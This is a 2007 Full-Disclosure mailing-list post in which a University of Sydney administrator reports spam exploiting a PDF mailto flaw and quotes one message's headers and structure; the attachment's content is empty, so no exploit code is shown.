Date: Tue, 23 Oct 2007 22:18:52 +1000
From: Paul Szabo <psz@...hs.usyd.edu.au>
To: full-disclosure@...ts.grok.org.uk
Subject: PDF mailto exploit in the wild

In case you are interested... messages like the following were spammed
to my users tonight.

Cheers,

Paul Szabo   psz@...hs.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia

---
> From sabansal1@...il.com Tue Oct 23 18:20:46 2007
> Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.187])
> 	by london.ucc.usyd.edu.au (Postfix) with ESMTP id 17D582CAC1E
> 	for <tang@...hs.usyd.edu.au>; Tue, 23 Oct 2007 18:20:13 +1000 (EST)
> Received: by nf-out-0910.google.com with SMTP id b2so1929536nfb
>         for <tang@...hs.usyd.edu.au>; Tue, 23 Oct 2007 01:20:12 -0700 (PDT)
> DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
>         d=gmail.com; s=beta;
>         h=domainkey-signature:received:received:message-id:to:subject:date:mime-version:x-mailer:x-mimeole:thread-index:content-type:from;
>         bh=RBeyhq9knF4zOhfDArq39Bm0/FWUFdutXHfudq1gwxE=;
>         b=Qs8RvpCyO4UBVRo3N73MXad3ZQWzfT/6L1+snsI7Ty0ZwHuynJLpIBAIcVEGGxvfs9+pB06orF5efPl7aYqq3jQBI19jZBMUE9Tcf2TndqhPmE3nIADCgUnWEP5xo5xGug2lq6coG8MfdZd6+oIYtkdCMzl6nweV1f76zYWereQ=
> DomainKey-Signature: a=rsa-sha1; c=nofws;
>         d=gmail.com; s=beta;
>         h=received:message-id:to:subject:date:mime-version:x-mailer:x-mimeole:thread-index:content-type:from;
>         b=h1M0bnJzcqTTj5XzB6QgMJ0ugePdD1uvgzov2kTbStB+KW9WsynewPJJlv0ml/ILNka98867Gm2QrvL+2V5esH7Flnm5EJXpMxDSwiSv84SExd7TZFxdAsy2tYd2eiQ+Wy2Z6SlaLdZdbQv27sJ8tdN9QGNxBFWyYotdY4LwH7Y=
> Received: by 10.82.112.3 with SMTP id k3mr5564785buc.1193127611679;
>         Tue, 23 Oct 2007 01:20:11 -0700 (PDT)
> Received: from ?12.206.143.237? ( [12.206.143.237])
>         by mx.google.com with ESMTPS id k7sm6753182nfh.2007.10.23.01.20.06
>         (version=SSLv3 cipher=OTHER);
>         Tue, 23 Oct 2007 01:20:10 -0700 (PDT)
> Message-ID: <G9THMfvCFEH0Ii.362DBDDF78@...18BS>
> To: <andrewadams2650@...mail.com>
> Subject: STATEMET  indigene 
> Date: Tue, 23 Oct 2007 08:11:47 +0000
> MIME-Version: 1.0
> X-Mailer: Microsoft Office Outlook, Build 11.0.5510
> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
> Thread-Index: leRJrPkueCIQWNOdN8y1PxNCM0wkvbPn8IKv
> Content-type: multipart/mixed;
>         boundary="----=_NextPart_000_00F6_04BCC8AB.87205748"
> From: Gilbert <sabansal1@...il.com>
> X-PMX-Version: USyd20070806 5.3.3.310218, Antispam-Engine: 2.5.2.311128, Antispam-Data: 2007.10.23.5823
> X-PerlMx-Spam: Gauge=IIIIIII, Probability=7%, Report='PDF_ATTACHED_2 0, PDF_SIZE_0_10K 0, __ATTACHMENT_SIZE_0_10K 0, __CT 0, __CTYPE_HAS_BOUNDARY 0, __CTYPE_MULTIPART 0, __FROM_GMAIL 0, __HAS_MSGID 0, __HAS_X_MAILER 0, __HELO_GMAIL 0, __MIME_VERSION 0, __RDNS_GMAIL 0, __SANE_MSGID 0, __USER_AGENT_MS_GENERIC 0, __pbl.spamhaus.org_TIMEOUT , __sbl.spamhaus.org_TIMEOUT '
> Content-Length: 5618
> Status: R
> 
> ------=_NextPart_000_00F6_04BCC8AB.87205748
> Content-Type: text/plain;
>         charset="Windows-1251"
> Content-Transfer-Encoding: 7bit
> 
>  fanner ctenoid varment
> 
> ------=_NextPart_000_00F6_04BCC8AB.87205748
> Content-type: application/octet-stream;
>         name="BILL.pdf"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment;
>         filename="INVOICE.pdf"
> 
> 
> ------=_NextPart_000_00F6_04BCC8AB.87205748--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
